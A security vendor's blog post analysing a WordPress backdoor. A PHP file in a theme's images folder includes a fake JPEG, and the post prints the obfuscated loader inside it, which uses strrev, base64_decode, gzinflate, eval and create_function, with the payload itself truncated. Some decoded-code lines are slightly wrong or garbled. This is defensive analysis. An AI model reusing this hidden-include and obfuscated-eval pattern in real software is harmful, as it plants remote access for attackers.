Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

During an incident response investigation, we detected an interesting backdoor that was hidden in a fake image. The attacker was quite creative in creating an attack that would work in two steps.


The attacker created two files. The first file was a normal looking php file that would include the fake image.  

Let’s review the content located in the php file: “./wp-content/themes/twentythirteen/images/3.php

<?php
include("check-db.jpg");
?>

When looking at the code inside the file:  “./wp-content/themes/twentythirteen/images/3.php” we see a strange use of the include function that’s including check-db.jpg but that in itself is not malware.

Let’s go ahead and inspect the image "check-db.jpg". After trying to open the file in the browser it looked as if the image was corrupt, as nothing was displaying.

We then opened the file in a normal text editor and found the main source of the backdoor.

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr
…
yATx5A1QePTKD1/kV6K8xfVv";
$_A=strrev("esab")."64_".strrev("edoced");
$_X=$_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');
$trd=strrev("taerc")."e_f".strrev("noitcnu");
$ctel=$trd('$_S',$_X);
$ctel($_S); ?>

Let’s work through the malicious code located inside the fake image “./wp-content/themes/twentythirteen/images/check-db.jpg” step by step to see how it works and how it enables the attacker to gain access to your website files.

First, the variable $_S contains all the malicious code and that will create the backdoor the attacker will use to gain access to your website.

$_S="7RpdbxvH8d2A/8P6wvhIhJ+iZFsij07hyHFQp3Zip2gr
…
yATx5A1QePTKD1/kV6K8xfVv";

The variable $_A contains the function base64_decode once it has been reversed by the strrev function. $_A before it’s been reversed by the strrev function

$_A=strrev("esab")."64_".strrev("edoced");

$_A after it’s been reversed by the strrev function $_A = "base64_decode";

The next step is where the hacker calls a base64_encoded string that will be decoded by the base64_decode function assigned to the $_A variable.

The $_X variable will be decoded by the function “base64_decode” and once complete it will contain the necessary code to execute and create the backdoor for the attacker.

$_X before it’s decoded by the “base64_decode” function

$_X = $_A('ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgkX1MpKSk7');

$_X after it’s been decoded by the “base64_decode” function

$_X = base64_decode(eval(gzinflate(base64_decode($_S))));

The variable $trd contains the function create_function but it needs to be reversed in order to be used. $trd before it’s been reversed by the strrev function

$trd=strrev("taerc")."e_f".strrev("noitcnu");

$trd after it’s been reversed by the strrev function

$trd  = “create_function”;
$ctel
$trd=“create_function”;
$ctel=$trd('7Rpdb...',base64_decode(eval(gzinflate(base64_decode($_S))));
);
$ctel($_S);

Now the following variables $trd & $ctel will combine and execute all the functions to give the attacker full access to your website files/folders.


If you want to be sure that your website is not infected, or if you need help cleaning it up, let us know.